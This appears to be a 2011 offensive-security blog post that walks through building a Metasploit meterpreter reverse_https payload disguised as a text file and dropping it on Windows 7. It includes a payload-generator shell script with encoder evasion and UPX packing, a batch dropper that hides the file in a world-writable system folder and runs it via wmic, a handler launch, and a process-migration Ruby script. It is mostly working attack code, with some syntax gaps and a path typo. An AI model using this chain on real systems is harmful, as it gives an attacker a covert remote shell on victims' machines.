Executable text files

Okay nothing new here, just a trick to load a text file which is in fact a win32 PE binary. I’ve come across an interesting article about Alternate Data Streams on this excellent blog : http://www.exploit-monday.com/2011/09/stealth-alternate-data-streams-and.html   and decided to utilize ADS in my exercise scenario in which we attack Win7 SP1 32bit.


I’ve written a custom Metasploit script generator which will create our files and put them in a ShellCode folder in the Metasploit directory. Again this should be placed in Metasploit root folder and made executable.

echo "************************************************************"
echo "           Automatic shellcode generator                    "
echo "                  By Astr0baby 2011                         "
echo "    For Automatic Teensy programming and deployment         "
echo "************************************************************"
echo "Here is a network device list available on yor machine"
cat /proc/net/dev | tr -s  ' ' | cut -d ' ' -f1,2 | sed -e '1,2d'
echo -e "What network interface are we gonna use ?  \c"
read interface
echo -e "What Port Number are we gonna listen to? : \c"
read port
# Get OS name
IO="" # store IP
case $OS in
   Linux) IP=`ifconfig $interface  | grep 'inet addr:'| grep -v '' | cut -d: -f2 | awk '{ print $1}'`;;
   *) IP="Unknown";;
#echo "$IP"
./msfpayload windows/meterpreter/reverse_https LHOST=$IP LPORT=$port EXITFUNC=process R | ./msfencode  -X custom-templates/write.exe -e x86/shikata_ga_nai -c 6  -t exe  > Document.txt

if [ ! -d "$ShellCode" ]; then
mkdir ShellCode
mv Document.txt  ShellCode
upx -9 ShellCode/Document.txt
echo '@echo off' > ShellCode/run.bat
echo 'copy Document.txt C:\ProgramData\Micorosft\DeviceSync\' >> ShellCode/run.bat
echo 'wmic process call create \\.\C:\ProgramData\Microsoft\DeviceSync\Document.txt' >> ShellCode/run.bat
echo 'exit' >> ShellCode/run.bat
todos ShellCode/run.bat
echo "--------------------------------------------------------------------------"
echo "run.bat and Document.txt created in ShellCode folder, ready for deployment"
echo "--------------------------------------------------------------------------"

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_https LHOST=$IP LPORT=$port AutoRunScript='migrate2 explorer.exe'  E

Please note that in this script a custom executable template folder is called custom-templates in the root Metasploit folder where the template executables are. Again use your own. The Payload is then packed using upx packer to make it fit onto Teensy. Also I am using a different migrate2.rb meterpreter script as the latest one cannot automigrate to process name given, only to given process ID which we obviously  do not know.  So here it is

# $Id: migrate.rb 10277 2010-09-09 16:09:27Z darkoperator $
# Simple example script that migrates to a specific process by name.
# This is meant as an illustration.

spawn = false
target = nil

opts = Rex::Parser::Arguments.new(
        "-h" => [ false,"Help menu." ],
        "-f" => [ false, "Launch a process and migrate into the new process"]
opts.parse(args) { |opt, idx, val|
        case opt
        when "-f"
                spawn = true
        when "-h"
                print_line("USAGE:   run migrate [process name]")
                print_line("EXAMPLE: run migrate explorer.exe")
                raise Rex::Script::Completed
                target = val

if client.platform =~ /win32|win64/
        server = client.sys.process.open

        print_status("Current server process: #{server.name} (#{server.pid})")

        target_pid = nil

        if ! spawn
                # Get the target process name
                target ||= "lsass.exe"
                print_status("Migrating to #{target}...")

                # Get the target process pid
                target_pid = client.sys.process[target]

                if not target_pid
                        print_error("Could not access the target process")
                        print_status("Spawning a notepad.exe host process...")
                        note = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true })
                        target_pid = note.pid
                target ||= "notepad.exe"
                print_status("Spawning a #{target} host process...")
                newproc = client.sys.process.execute(target, nil, {'Hidden' => true })
                target_pid = newproc.pid
                if not target_pid
                        print_error("Could not create a process around #{target}")
                        raise Rex::Script::Completed

        # Do the migration
        print_status("Migrating into process ID #{target_pid}")
        server = client.sys.process.open
        print_status("New server process: #{server.name} (#{server.pid})")

        print_error("This version of Meterpreter is not supported with this Script!")
        raise Rex::Script::Completed

We are using a default ACL weakness in Windows7 in this folder : C:\ProgramData\Microsoft\DeviceSync\    it has Full Control for everyone so its a perfect place to hide the payload.  There are many other places so search for yourself using the AccessEnum.exe from SysinternalsSuite.

The last part is pretty obvious. Execute the batch run.bat on the external usb somehow. This can be easily done by Teensy like I’ve demonstrated in the previous examples.

To sum it up we are executing Document.txt via wmic process create which was silently dropped into the C:\ProgramData\Microsoft\DeviceSync\  folder.

Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s